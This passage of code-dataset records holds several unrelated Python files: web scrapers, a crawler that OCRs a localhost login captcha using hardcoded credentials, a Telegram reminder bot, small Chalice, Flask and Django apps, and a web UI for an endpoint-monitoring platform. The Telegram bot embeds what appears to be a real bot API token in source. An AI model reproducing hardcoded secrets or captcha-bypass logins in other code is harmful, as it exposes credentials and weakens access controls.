KeyError:\n images = []\n \n self.created_at = created_at\n self.title = title\n self.author = author\n self.text = text\n self.images = images\n\n\n def set_data_from_url(self, url):\n self.set_url(url)\n self._get_article()\n self.set_data(self.article)\n\n\nclass Page(Blog):\n def __init__(self, page_url):\n self.page_url = page_url\n self.all_data = []\n self.set_data_from_url()\n\n def __len__(self):\n return len(self.all_data)\n \n def set_data_from_url(self):\n r = requests.get(self.page_url)\n soup = BeautifulSoup(r.content, 'html.parser')\n articles = soup.find_all('article')\n for article in articles:\n b = Blog()\n b.set_data(article)\n self.all_data.append(b)\n\n def save_image(self, image_dir):\n for b in self.all_data:\n imgs = b.images\n name = b.author\n created_at = b.created_at\n DIR = image_dir + \"/\" + name\n if not os.path.exists(DIR):\n os.makedirs(DIR)\n if imgs != []:\n for idx, i in enumerate(imgs):\n ext = i.split(\".\")[-1]\n filename = \"{}/{}_{}.{}\".format(DIR, created_at, str(idx), ext)\n img = dutil.download_image(i)\n if img != None:\n dutil.save_image(filename, img)\n\n\ndef get_member_list():\n \"\"\" メンバーのリストを取得する\n \"\"\"\n url = \"https://www.keyakizaka46.com/s/k46o/search/artist?ima=0000\"\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'html.parser')\n box_member = soup.find_all(\"div\", {'class': 'box-member'})\n box_member = box_member[-1].find_all(\"li\")\n \n member_dict = {}\n for i in box_member:\n href = i.find(\"a\").get(\"href\")\n id_ = href.split(\"/\")[-1].rstrip(\"?ima=0000\")\n img_url = i.find(\"img\")[\"src\"]\n author = i.find(\"p\", {\"class\": \"name\"}).text.strip()\n birth = i.find(\"p\", {\"class\": \"birth\"}).text.strip()\n member_dict[author] = [id_, href, img_url, birth]\n return member_dict\n\ndef test_get_blog():\n b = Blog()\n #b.set_data_from_url(\"http://www.keyakizaka46.com/s/k46o/diary/detail/15824?ima=0000&cd=member\")\n 
b.set_data_from_url(\"http://www.keyakizaka46.com/s/k46o/diary/detail/15557?ima=0000&cd=member\")\n print(\"url:\" , b.url)\n print(\"created_at:\", b.created_at)\n print(\"title:\" , b.title )\n print(\"author:\" , b.author )\n print(\"text:\" , b.text )\n print(\"images:\" , b.images )\n\ndef test_get_page():\n page_number = 1\n p = Page(\"http://www.keyakizaka46.com/s/k46o/diary/member/list?ima=0000&page=1&cd=member&ct=03\")\n print(\"url:\" , p.all_data[page_number].url)\n print(\"created_at:\", p.all_data[page_number].created_at)\n print(\"title:\" , p.all_data[page_number].title )\n print(\"author:\" , p.all_data[page_number].author )\n #print(\"text:\" , p.all_data[page_number].text )\n print(\"images:\" , p.all_data[page_number].images )\n print(\"len:\" , len(p))\n \n # 写真の保存\n #p.save_image()\n\ndef search_blog2save(name, start_page_num=0, max_page_num=10):\n members = get_member_list()\n for i in range(start_page_num, max_page_num):\n print(\"...{}\".format(max_page_num - i))\n url = \"http://www.keyakizaka46.com/s/k46o/diary/member/list?ima=0000&page={}&cd=member&ct={}\".format(i, members[name][0])\n p = Page(url)\n if len(p) == 0:\n continue\n \n # 写真を保存する\n p.save_image(image_dir)\n path = p.page_url.split(\"/\")[-1]\n dutil.save_pickle(p, path, blog_data_dir)\n\n\nif __name__ == \"__main__\":\n m = get_member_list()\n for i in m.keys(): # メンバーの名前のリスト\n print(i)\n search_blog2save(i)\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"324962965","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nimport pytesseract\nfrom PIL import Image\nimport re\n\nimage_url='http://localhost:8080/tdd/checkcode/image.jsp'\ndir='/opt/projects/pyproject'\nif not os.path.exists(dir):\n os.mkdir(dir)\nos.chdir(dir)\nr=requests.get(image_url)\nimg_content=r.content\nfile='checkcode.jpg'\nif(os.path.exists(file)):\n os.remove(file)\nwith open(file,'ab') as img_object:\n img_object.write(img_content)\n img_object.flush()\nimage=Image.open('checkcode.jpg')\ncode=pytesseract.image_to_string(image)\nprint(code)\n#####根据得到的验证码登录系统\ncode='&checkCode='+code\nurl='http://localhost:8080/tdd/login.action'\npostdata={\"loginName\":\"ddwl\",\"password\":\"ddwl\",\"checkCode\":\"2503\",\"platfromFlag\":\"localhost:8080\"}\ndata='?loginName=ddwl&password=ddwl&platformFlag=localhost:8080'\nheaders={'content-type': 'application/json'}\nr=requests.post(url+data+code,headers=headers,data=postdata)\n\nhtml=r.content\nhtml_doc=str(html,'utf-8') #html_doc=html.decode(\"utf-8\",\"ignore\")\nprint(html_doc)\n###进入主页爬取内容\nmain_url='http://localhost:8080/tdd/manager/manager_managerCenter.action'\nr_main=requests.post(main_url,cookies=r.cookies)\n\nif os.path.exists('main.txt'):\n os.remove('main.txt')\nwith open('main.txt','ab') as main_content:\n main_content.write(r_main.content)\n main_content.flush()\nsoup=BeautifulSoup(r_main.text,'html.parser',from_encoding='utf-8')\nlinks=soup.find_all('a', href=re.compile(r\"/tdd/\\w+\"))\nprint(links)\nnew_urls=set()\nfor link in links:\n url='http://localhost:8080'+link['href']\n new_urls.add(url)\nprint(new_urls)\n\nif os.path.exists('data.txt'):\n os.remove('data.txt')\n\nwith open('data.txt','w') as data_content:\n\n for url in new_urls:\n r_table=requests.post(url,cookies=r.cookies)\n soup_table=BeautifulSoup(r_table.text,'html.parser',from_encoding='utf-8')\n tags=soup_table.find_all('td')\n txt=[]\n for tag in 
tags:\n txt.append(tag.get_text())\n # print(soup_table.find_all('td'))\n data_content.write(str(txt))\n data_content.flush()","sub_path":"PycharmProjects/spiderdida/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"120729888","text":"from typing import Dict, Any, List\n\nimport telebot, datetime\nfrom telebot.types import CallbackQuery\n\n\nclass RiskyObject:\n name: str\n last_checked: datetime.date\n\n def __init__(self, name, last_checked=datetime.datetime.min):\n self.name = name\n self.last_checked = last_checked\n def __repr__(self):\n return self.name + \": \" + str(self.last_checked)\n\n\n\nACTION_ADD = 'Добавить'\nACTION_DELETE = 'Удалить'\nACTION_DO = 'Отметить действие'\nACTION_LIST = 'Проверить'\nACTION_INIT_FILL = 'Создай'\nACTION_NO_INIT_FILL = 'Не надо, сам создам'\nACTION_BACK = 'Назад'\nACTION_MENU = 'Меню'\n\nbot = telebot.TeleBot('1492966650:AAE8kbS_X662fK0XEAgazR-vrSRd7sdFEwU')\nobjects_map: Dict[int, List[RiskyObject]] = {}\n\nkeyboardMain = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\nkeyboardMain.row(ACTION_DO, ACTION_LIST)\nkeyboardMain.row(ACTION_ADD, ACTION_DELETE)\n\nkeyboardStart = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\nkeyboardStart.row(ACTION_INIT_FILL, ACTION_NO_INIT_FILL)\n\n\ndef print_db():\n print(objects_map)\n\n@bot.message_handler(commands=['start'])\ndef start_message(message):\n bot.send_message(message.chat.id, 'Привет, я помогу тебе не волноваться об утюге, плите или незакрытой двери - '\n 'просто отметь все перед выходом. Можешь даже сфотографировать (скоро добавим),'\n ' если мне не доверяешь. Для начала надо добавить объекты или действия,'\n ' которые тебя регулярно тревожат. 
Я могу помочь и создать три самых популярных -'\n ' выключить утюг, выключить плиту, закрыть дверь', reply_markup=keyboardStart)\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_INIT_FILL)\ndef on_init_fill_request(message):\n add_item(message.from_user.id, 'Выключить плиту')\n add_item(message.from_user.id, 'Выключить утюг')\n add_item(message.from_user.id, 'Закрыть дверь')\n bot.send_message(message.chat.id, 'Добавил!', reply_markup=keyboardMain)\n print_db()\n\n\ndef on_add_item_request(message):\n add_item(message.from_user.id, message.text)\n bot.send_message(message.chat.id, 'Добавлeно!', reply_markup=keyboardMain)\n print_db()\n\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_ADD)\ndef on_add_request(message):\n msg = bot.send_message(message.chat.id, 'Введи действие: ')\n bot.register_next_step_handler(msg, on_add_item_request)\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_DELETE)\ndef on_delete_request(message):\n if message.from_user.id in objects_map and len(objects_map[message.from_user.id]) > 0:\n keyboard_actions = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard_actions.row(*[obj.name for obj in objects_map[message.from_user.id]])\n keyboard_actions.row(telebot.types.KeyboardButton(ACTION_BACK))\n bot.send_message(message.chat.id, 'Какое действие хочешь удалить?', reply_markup=keyboard_actions)\n else:\n bot.send_message(message.chat.id, 'А удалять то нечего(',\n reply_markup=keyboardMain)\n\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_DO)\ndef on_do_action_request(message):\n if message.from_user.id in objects_map and len(objects_map[message.from_user.id]) > 0:\n keyboard_actions = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard_actions.row(*[obj.name for obj in objects_map[message.from_user.id]])\n keyboard_actions.row(telebot.types.KeyboardButton(ACTION_BACK))\n msg = bot.send_message(message.chat.id, 'Слава, что ты сделал?', reply_markup=keyboard_actions)\n bot.register_next_step_handler(msg, on_do_exact_action_request)\n else:\n bot.send_message(message.chat.id, 'Сначала добавь актвности, за которые ты переживаешь.',\n reply_markup=keyboardMain)\n\n\ndef on_do_exact_action_request(message):\n refresh_item_time(message.from_user.id, message.text)\n bot.send_message(message.chat.id, 'Отлично!', reply_markup=keyboardMain)\n print_db()\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_LIST)\ndef on_list_request(message):\n if message.from_user.id in objects_map and len(objects_map[message.from_user.id]) > 0:\n for obj in objects_map[message.from_user.id]:\n bot.send_message(message.chat.id,\n 'Действие ' + obj.name + ', совершено в ' + obj.last_checked.strftime(\n \"%d/%m, %H:%M:%S\"))\n else:\n bot.send_message(message.chat.id, 'Пока что ты не за что не переживаешь :D', reply_markup=keyboardMain)\n\n\n@bot.message_handler(func=lambda message: message.text == ACTION_BACK)\n@bot.message_handler(func=lambda message: message.text == ACTION_MENU)\n@bot.message_handler(func=lambda message: message.text == ACTION_NO_INIT_FILL)\ndef on_back_to_menu_request(message):\n bot.send_message(message.chat.id, ACTION_MENU, reply_markup=keyboardMain)\n\n@bot.message_handler(func=lambda message: message.from_user.id in objects_map and message.text in [obj.name for obj in\n objects_map[\n message.from_user.id]])\ndef on_delete_item_request(message):\n stored_obj: RiskyObject = [obj for obj in objects_map[message.from_user.id] if obj.name == 
message.text][0]\n objects_map[message.from_user.id].remove(stored_obj)\n bot.send_message(message.chat.id, 'Удалено!', reply_markup=keyboardMain)\n print_db()\n\n\ndef add_item(user_id, item_name):\n if user_id not in objects_map:\n objects_map[user_id] = []\n\n objects_map[user_id].append(RiskyObject(item_name, datetime.datetime.min))\n\n\ndef refresh_item_time(user_id, item_name):\n stored_obj: RiskyObject = [obj for obj in objects_map[user_id] if obj.name == item_name][0]\n stored_obj.last_checked = datetime.datetime.now()\n\n\nbot.polling()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"145578871","text":"import json\nfrom chalice import Chalice, CORSConfig\nfrom datetime import datetime, timedelta, date, time\nfrom chalicelib import data_funcs\n\napp = Chalice(app_name='data-dashboard')\n\ncors_config = CORSConfig(\n allow_origin='https://dashboard.transitmatters.org',\n max_age=3600\n)\n\ndef destructure_date(date):\n date_split = date.split('-')\n return {\n 'year': int(date_split[0]),\n 'month': int(date_split[1]),\n 'day': int(date_split[2])\n }\n\n@app.route(\"/headways/{user_date}\", cors=cors_config)\ndef headways_route(user_date):\n station = app.current_request.query_params.get('station')\n parsed_date = destructure_date(user_date)\n return data_funcs.headways(date(year=parsed_date['year'], month=parsed_date['month'], day=parsed_date['day']), {\"stop\": station})\n\n\n@app.route(\"/dwells/{user_date}\", cors=cors_config)\ndef dwells_route(user_date):\n station = app.current_request.query_params.get('station')\n parsed_date = destructure_date(user_date)\n return data_funcs.dwells(date(year=parsed_date['year'], month=parsed_date['month'], day=parsed_date['day']), {\"stop\": station})\n\n\n@app.route(\"/traveltimes/{user_date}\", cors=cors_config)\ndef traveltime_route(user_date):\n station_from = app.current_request.query_params.get('station_from')\n station_to = app.current_request.query_params.get('station_to')\n parsed_date = destructure_date(user_date)\n return data_funcs.travel_times(\n date(year=parsed_date['year'], month=parsed_date['month'], day=parsed_date['day']), {\"from_stop\": station_from, \"to_stop\": station_to}\n )\n","sub_path":"server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"364449774","text":"from flask import Flask, render_template\nfrom flask_login import UserMixin\nfrom flask.ext.bootstrap import Bootstrap, WebCDN, ConditionalCDN, BOOTSTRAP_VERSION, JQUERY_VERSION, HTML5SHIV_VERSION, RESPONDJS_VERSION \n\napp = Flask(__name__)\nbootstrap = Bootstrap(app)\n\ndef change_cdn_domestic(tar_app):\n static = tar_app.extensions['bootstrap']['cdns']['static']\n local = tar_app.extensions['bootstrap']['cdns']['local']\n\n def change_one(tar_lib, tar_ver, fallback):\n tar_js = ConditionalCDN('BOOTSTRAP_SERVE_LOCAL', fallback,\n WebCDN('//cdn.bootcss.com/' + tar_lib + '/' + tar_ver + '/'))\n tar_app.extensions['bootstrap']['cdns'][tar_lib] = tar_js\n\n libs = {'jquery': {'ver': JQUERY_VERSION, 'fallback': local},\n 'bootstrap': {'ver': BOOTSTRAP_VERSION, 'fallback': local},\n 'html5shiv': {'ver': HTML5SHIV_VERSION, 'fallback': static},\n 'respond.js': {'ver': RESPONDJS_VERSION, 'fallback': static}}\n for lib, par in libs.items():\n change_one(lib, par['ver'], 
par['fallback'])\n\nchange_cdn_domestic(app)\n\n@app.route('/user/',methods=['GET','POST'])\ndef user(name):\n #if request.method =='POST':\n # content = request.form['content']\n # return render_template('user1.html', name=content)\n return render_template('user.html', name=name)\n\n@app.route('/abstract/')\ndef abstract():\n return render_template('abstract.html', title_name = 'abstract demo')\n\n@app.route('/')\ndef home():\n return render_template('home.html', title_name = 'welcome')\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"logintest.py","file_name":"logintest.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"390132497","text":"from requests_html import AsyncHTMLSession\nimport re\nfrom openpyxl import Workbook, load_workbook\n\nclass Scraper(AsyncHTMLSession):\n def __init__(self):\n AsyncHTMLSession.__init__(self)\n self.comments = []\n self.scraped_pages = []\n \n async def __comments(self, links):\n \"\"\"\n Private method to scrap comments from passed list of topics.\n It opens each topic and scrap the avaialbe comments.\n \n links:array - All topics from the certain page\n \"\"\"\n for link in links:\n try:\n link_response = await self.get(link, verify=False)\n link_comments = link_response.html.find(\"div[class='text'] p\")\n for comment in link_comments:\n try:\n r = re.search(r'(?:: )(.*)', comment.text)\n self.comments.append(r.group(0)[1:])\n except AttributeError:\n self.comments.append(comment.text)\n except:\n continue\n\n async def _base(self, range1, range2):\n \"\"\"\n Main pattern to scrap topics from pages\n range1:int - Iteration start\n range2:int - Iteration stop\n \"\"\"\n for x in range(range1, range2):\n try:\n site_content = await self.get(f\"https://www.wykop.pl/strona/{x}/\", verify=False)\n topics = site_content.html.find(\"div[class='lcontrast m-reset-margin'] h2 a\")\n links = ([topic.attrs[\"href\"] for topic in topics])\n await self.__comments(links)\n except:\n continue\n\nclass Excel(Workbook):\n def __init__(self):\n Workbook.__init__(self)\n self.ws = self.active\n self.workbook_name = f\"list.xlsx\"\n try:\n self.load = load_workbook(self.workbook_name)\n except FileNotFoundError:\n headers = \"comment\"\n self.ws.cell(row=1, column=1, value=headers) #// +1 because it must be at least 1\n self.save(self.workbook_name)\n \n def add_data(self, comments):\n \"\"\"Writes data to excel\"\"\"\n self.load = load_workbook(self.workbook_name)\n self.ns = self.load.get_sheet_by_name(\"Sheet\")\n for comment in comments:\n try:\n if len(comment) > 0:\n data_row = [comment]\n self.ns.append(data_row)\n except:\n continue\n self.load.save(self.workbook_name)\n\nclass Tasks(Scraper, Excel):\n def __init__(self, iterations=5):\n self.iterations = iterations\n Scraper.__init__(self)\n Excel.__init__(self)\n \n def task_creator(self):\n \"\"\"\n Creates dynamic async functions and store them in \n array whichc is unziped to asyncio loop starter\n \"\"\"\n functions = []\n first = 3000\n second = 3300\n for x in range(self.iterations):\n async def base(range1=first,range2=second):\n await self._base(range1, range2)\n functions.append(base)\n if first and second < 6000:\n first += 300\n second += 300\n else: break\n return functions\n\n def start(self):\n self.run(*self.task_creator())\n self.add_data(self.comments)\n \nif __name__ == \"__main__\":\n T = Tasks(iterations=8)\n 
T.start()\n","sub_path":"asynchronic.py","file_name":"asynchronic.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"592142062","text":"from django.urls import path\n\nfrom .views import (\n EventCategoriesView,\n EventsView,\n SingleEventView,\n EventSignUpsView,\n EventLikesView,\n EventCommentsView,\n)\n\nurlpatterns = [\n path(\"\", EventsView.as_view(), name=\"events\"),\n path(\"categories\", EventCategoriesView.as_view(), name=\"event_categories\"),\n path(\"signups\", EventSignUpsView.as_view(), name=\"event_sign_ups\"),\n path(\"likes\", EventLikesView.as_view(), name=\"event_likes\"),\n path(\"comments\", EventCommentsView.as_view(), name=\"event_comments\"),\n path(\"\", SingleEventView.as_view(), name=\"single_event\"),\n]\n","sub_path":"backend/eventology/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"214478698","text":"# Copyright 2015 refractionPOINT\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom gevent import monkey\nmonkey.patch_all()\n\nimport os\nimport sys\n\nfrom beach.beach_api import Beach\n\nimport traceback\nimport web\nimport datetime\nimport time\nimport json\nimport base64\nfrom functools import wraps\n\n\n###############################################################################\n# CUSTOM EXCEPTIONS\n###############################################################################\n\n\n###############################################################################\n# REFERENCE ELEMENTS\n###############################################################################\n\n\n###############################################################################\n# CORE HELPER FUNCTIONS\n###############################################################################\ndef tsToTime( ts ):\n return datetime.datetime.fromtimestamp( int( ts ) ).strftime( '%Y-%m-%d %H:%M:%S' )\n\ndef timeToTs( timeStr ):\n return time.mktime( datetime.datetime.strptime( timeStr, '%Y-%m-%d %H:%M:%S' ).timetuple() )\n\ndef _xm_( o, path, isWildcardDepth = False ):\n def _isDynamicType( e ):\n eType = type( e )\n return issubclass( eType, dict ) or issubclass( eType, list ) or issubclass( eType, tuple )\n\n def _isListType( e ):\n eType = type( e )\n return issubclass( eType, list ) or issubclass( eType, tuple )\n\n def _isSeqType( e ):\n eType = type( e )\n return issubclass( eType, dict )\n\n result = []\n oType = type( o )\n\n if type( path ) is str or type( path ) is unicode:\n tokens = [ x for x in path.split( '/' ) if x != '' ]\n else:\n tokens = path\n\n if issubclass( oType, dict ):\n isEndPoint = False\n if 0 != len( tokens ):\n if 1 == len( tokens ):\n isEndPoint = True\n\n curToken = tokens[ 0 ]\n\n if '*' == curToken:\n if 1 < len( tokens ):\n result = _xm_( o, tokens[ 1 : ], True )\n elif '?' 
== curToken:\n if 1 < len( tokens ):\n result = []\n for elem in o.itervalues():\n if _isDynamicType( elem ):\n result += _xm_( elem, tokens[ 1 : ], False )\n\n elif o.has_key( curToken ):\n if isEndPoint:\n result = [ o[ curToken ] ] if not _isListType( o[ curToken ] ) else o[ curToken ]\n elif _isDynamicType( o[ curToken ] ):\n result = _xm_( o[ curToken ], tokens[ 1 : ] )\n\n if isWildcardDepth:\n tmpTokens = tokens[ : ]\n for elem in o.itervalues():\n if _isDynamicType( elem ):\n result += _xm_( elem, tmpTokens, True )\n elif issubclass( oType, list ) or oType is tuple:\n result = []\n for elem in o:\n if _isDynamicType( elem ):\n result += _xm_( elem, tokens )\n\n return result\n\ndef _x_( o, path, isWildcardDepth = False ):\n r = _xm_( o, path, isWildcardDepth )\n if 0 != len( r ):\n r = r[ 0 ]\n else:\n r = None\n return r\n\ndef sanitizeJson( o, summarized = False ):\n if type( o ) is dict:\n for k, v in o.iteritems():\n o[ k ] = sanitizeJson( v, summarized = summarized )\n elif type( o ) is list or type( o ) is tuple:\n o = [ sanitizeJson( x, summarized = summarized ) for x in o ]\n else:\n try:\n json.dumps( o )\n except:\n o = base64.b64encode( o )\n if summarized is not False and len( str( o ) ) > summarized:\n o = str( o[ : summarized ] ) + '...'\n\n return o\n\ndef downloadFileName( name ):\n web.header( 'Content-Disposition', 'attachment;filename=\"%s\"' % name )\n\n###############################################################################\n# PAGE DECORATORS\n###############################################################################\ndef jsonApi( f ):\n ''' Decorator to basic exception handling on function. '''\n @wraps( f )\n def wrapped( *args, **kwargs ):\n web.header( 'Content-Type', 'application/json' )\n r = f( *args, **kwargs )\n try:\n return json.dumps( r )\n except:\n return json.dumps( { 'error' : str( r ) } )\n return wrapped\n\ndef fileDownload( f ):\n ''' Decorator to basic exception handling on function. 
'''\n @wraps( f )\n def wrapped( *args, **kwargs ):\n web.header( 'Content-Type', 'application/octet-stream' )\n return f( *args, **kwargs )\n return wrapped\n\n###############################################################################\n# PAGES\n###############################################################################\nclass Index:\n def GET( self ):\n return render.index()\n\nclass Dashboard:\n def GET( self ):\n\n sensors = model.request( 'list_sensors', {} )\n\n if not sensors.isSuccess:\n return render.error( str( sensors ) )\n\n return render.dashboard( sensors = sanitizeJson( sensors.data ) )\n\nclass Sensor:\n def GET( self ):\n params = web.input( sensor_id = None, before = None, after = None, max_size = '4096', per_page = '10' )\n\n if params.sensor_id is None:\n return render.error( 'sensor_id required' )\n\n info = model.request( 'get_sensor_info', { 'id_or_host' : params.sensor_id } )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n if 0 == len( info.data ):\n return render.error( 'Sensor not found' )\n\n before = None\n after = None\n\n if '' != params.before:\n before = params.before\n if '' != params.after:\n after = params.after\n\n return render.sensor( info.data[ 'id' ], before, after, params.max_size, params.per_page )\n\nclass SensorState:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n info = model.request( 'get_sensor_info', { 'id_or_host' : params.sensor_id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable: %s' % str( info ) )\n\n if 0 == len( info.data ):\n raise web.HTTPError( '204 No Content: sensor not found' )\n\n return info.data\n\nclass Timeline:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None, after = None, before = None, max_size = '4096', rich = 'false', max_time = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n if params.after is None or '' == params.after:\n raise web.HTTPError( '400 Bad Request: need start time' )\n\n start_time = int( params.after )\n max_size = int( params.max_size )\n max_time = 60 * 60 * 4\n if params.max_time is not None and '' != params.max_time:\n max_time = int( params.max_time )\n end_time = None\n if params.before is not None and '' != params.before:\n end_time = int( params.before )\n rich = True if params.rich == 'true' else False\n\n if 0 != start_time:\n effective_end_time = int( time.time() )\n if end_time is not None:\n effective_end_time = end_time\n if max_time < ( effective_end_time - start_time ):\n raise web.HTTPError( '400 Bad Request: maximum time lapse: %d - %d > %d' % ( effective_end_time, start_time, max_time ) )\n\n if 0 == start_time:\n start_time = int( time.time() ) - 5\n\n req = { 'id' : params.sensor_id,\n 'is_include_content' : True,\n 'after' : start_time }\n\n if not rich:\n req[ 'max_size' ] = max_size\n\n if end_time is not None:\n req[ 'before' ] = end_time\n\n info = model.request( 'get_timeline', req )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n if 0 == int( params.after ):\n info.data[ 'new_start' ] = start_time\n\n if rich:\n originalEvents = info.data.get( 'events', [] )\n info.data[ 'events' ] = []\n for event in originalEvents:\n richEvent = None\n if hasattr( eventRender, event[ 1 ] ):\n try:\n richEvent = str( getattr( eventRender, event[ 1 ] )( sanitizeJson( event[ 3 ] ) ) )\n except:\n richEvent = None\n if 
richEvent is None:\n richEvent = str( eventRender.default( sanitizeJson( event[ 3 ], summarized = 1024 ) ) )\n\n info.data[ 'events' ].append( ( event[ 0 ],\n event[ 1 ],\n event[ 2 ],\n richEvent ) )\n return info.data\n\nclass ObjSearch:\n def GET( self ):\n params = web.input( objname = None )\n\n if params.objname is None:\n return render.error( 'Must specify an object name' )\n\n objects = model.request( 'get_obj_list', { 'name' : params.objname } )\n\n if not objects.isSuccess:\n return render.error( str( objects ) )\n\n return render.objlist( sanitizeJson( objects.data[ 'objects' ] ), None )\n\nclass ObjViewer:\n def GET( self ):\n params = web.input( sensor_id = None, id = None )\n\n if params.id is None:\n return render.error( 'need to supply an object id' )\n\n req = { 'id' : params.id }\n\n if params.sensor_id is not None:\n req[ 'host' ] = params.sensor_id\n\n info = model.request( 'get_obj_view', req )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n return render.obj( sanitizeJson( info.data ), params.sensor_id )\n\nclass LastEvents:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n info = model.request( 'get_lastevents', { 'id' : params.sensor_id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable : %s' % str( info ) )\n\n return info.data.get( 'events', [] )\n\nclass EventView:\n def GET( self ):\n params = web.input( id = None, summarized = 1024 )\n\n if params.id is None:\n return render.error( 'need to supply an event id' )\n\n info = model.request( 'get_event', { 'id' : params.id } )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n return render.event( sanitizeJson( info.data.get( 'event', {} ), summarized = params.summarized ) )\n\nclass HostObjects:\n def GET( self ):\n params = web.input( sensor_id = None, otype = None )\n\n if params.sensor_id is None:\n return render.error( 'need to supply a sensor id' )\n\n req = { 'host' : params.sensor_id }\n\n if params.otype is not None:\n req[ 'type' ] = params.otype\n\n objects = model.request( 'get_obj_list', req )\n\n return render.objlist( sanitizeJson( objects.data[ 'objects' ] ), params.sensor_id )\n\nclass JsonDetects:\n @jsonApi\n def GET( self ):\n params = web.input( before = None, after = None )\n\n if params.after is None or '' == params.after:\n raise web.HTTPError( '400 Bad Request: start time required' )\n\n start_time = None\n if params.after is not None:\n start_time = int( params.after )\n\n if start_time is None or 0 == start_time:\n start_time = int( time.time() ) - 5\n\n search = {}\n\n if start_time is not None:\n search [ 'after' ] = start_time\n\n if params.before is not None:\n search[ 'before' ] = int( params.before )\n\n detects = model.request( 'get_detects', search )\n\n if not detects.isSuccess:\n return render.error( str( detects ) )\n else:\n return detects.data\n\nclass ViewDetects:\n def GET( self ):\n params = web.input( before = None, after = None )\n\n before = None\n after = None\n\n if params.before is not None and '' != params.before:\n before = params.before\n if params.after is not None and '' != params.after:\n after = params.after\n\n return render.detects( before, after )\n\nclass ViewDetect:\n def GET( self ):\n params = web.input( id = None )\n\n if params.id is None:\n return render.error( 'need to supply a detect id' )\n\n info = model.request( 'get_detect', { 'id' : params.id, 'with_events' : 
True } )\n\n if not info.isSuccess:\n return render.error( str( info ) )\n\n return render.detect( sanitizeJson( info.data.get( 'detect', [] ) ) )\n\nclass HostChanges:\n @jsonApi\n def GET( self ):\n params = web.input( sensor_id = None )\n\n if params.sensor_id is None:\n raise web.HTTPError( '400 Bad Request: sensor id required' )\n\n info = model.request( 'get_host_changes', { 'id' : params.sensor_id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable : %s' % str( info ) )\n\n return info.data.get( 'changes', {} )\n\nclass DownloadFileInEvent:\n @fileDownload\n def GET( self ):\n params = web.input( id = None )\n\n if params.id is None:\n raise web.HTTPError( '400 Bad Request: event id required' )\n\n info = model.request( 'get_file_in_event', { 'id' : params.id } )\n\n if not info.isSuccess:\n raise web.HTTPError( '503 Service Unavailable : %s' % str( info ) )\n\n if 'path' not in info.data or 'data' not in info.data:\n return render.error( 'no file path or content found in event' )\n\n downloadFileName( '%s__%s' % ( params.id, ( info.data[ 'path' ].replace( '/', '_' )\n .replace( '\\\\', '_' )\n .replace( '.', '_' ) ) ) )\n\n return info.data[ 'data' ]\n\n###############################################################################\n# BOILER PLATE\n###############################################################################\nos.chdir( os.path.dirname( os.path.abspath( __file__ ) ) )\n\nurls = ( r'/', 'Index',\n r'/dashboard', 'Dashboard',\n r'/sensor', 'Sensor',\n r'/search', 'Search',\n r'/sensor_state', 'SensorState',\n r'/timeline', 'Timeline',\n r'/objsearch', 'ObjSearch',\n r'/obj', 'ObjViewer',\n r'/lastevents', 'LastEvents',\n r'/event', 'EventView',\n r'/hostobjects', 'HostObjects',\n r'/detects_data', 'JsonDetects',\n r'/detects', 'ViewDetects',\n r'/detect', 'ViewDetect',\n r'/hostchanges', 'HostChanges',\n r'/downloadfileinevent', 'DownloadFileInEvent')\n\nweb.config.debug = False\napp = web.application( urls, globals() )\n\nrender = web.template.render( 'templates', base = 'base', globals = { 'json' : json,\n 'tsToTime' : tsToTime,\n '_x_' : _x_,\n '_xm_' : _xm_,\n 'hex' : hex,\n 'sanitize' : sanitizeJson } )\neventRender = web.template.render( 